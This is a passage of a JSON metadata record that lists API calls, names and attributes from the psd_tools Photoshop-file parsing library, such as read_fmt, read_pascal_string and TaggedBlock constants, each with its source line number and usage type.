"psd_tools.constants.TaggedBlock", "line_number": 769, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.FILTER_EFFECTS3", "line_number": 770, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 770, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 782, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_pascal_string", "line_number": 783, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 784, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 787, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 788, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 792, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 795, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.RawData", "line_number": 798, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 804, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 805, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 806, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.RawData", "line_number": 808, "usage_type": "call"}]}